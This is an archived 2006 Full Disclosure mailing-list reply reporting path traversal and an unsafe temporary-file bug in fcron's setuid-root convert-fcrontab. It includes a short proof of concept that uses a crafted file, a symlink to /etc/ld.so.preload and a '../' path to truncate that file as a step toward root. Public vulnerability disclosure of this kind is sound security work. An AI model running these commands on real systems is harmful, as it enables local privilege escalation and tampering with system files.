Full Disclosure mailing list archives
Re: Fcrontab - memory corruption on heap.
From: Karol Wiesek <appelast () drumnbass art pl>
Date: Thu, 2 Feb 2006 20:08:26 +0100
On Wed, Feb 01, 2006 at 03:28:50PM +0100, Adam Zabrocki wrote: => Name: Fcron - convert-fcrontab => Vendor URL: http://fcron.free.fr => Author: Adam Zabrocki <pi3ki31ny () wp pl> => Date: November 25, 2005 => => => => => Issue: => => Fcron (convert-fcrontab) allow users to corruption on heap section. Hi pi3 and list, There are much simplier bugs in convert-fcrontab, which toghether allows to gain uid0 privileges. * convert-fcrontab lacks any checks on file path passed to it. Attacker could get outside of fcron spool directory using "../". * convert-fcrontab opens temporary file without O_EXCL flag. PoC: perl -e '{print "fcrontab-017\nuser\x001132863099\n\x00\x00\x00\x00"}' > /tmp/fc_file ln -s /etc/ld.so.preload /tmp/fc_file.tmp convert-fcrontab ../../../../tmp/fc_file Will create empty /etc/ld.so.preload file or truncate existing. Tested on fcron 2.9.5 shipped with trustix 2.2 (setuid root by default), and fcron 3.0.0. regards Karol _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Fcrontab - memory corruption on heap. Adam Zabrocki (Feb 01)
- Re: Fcrontab - memory corruption on heap. Karol Wiesek (Feb 02)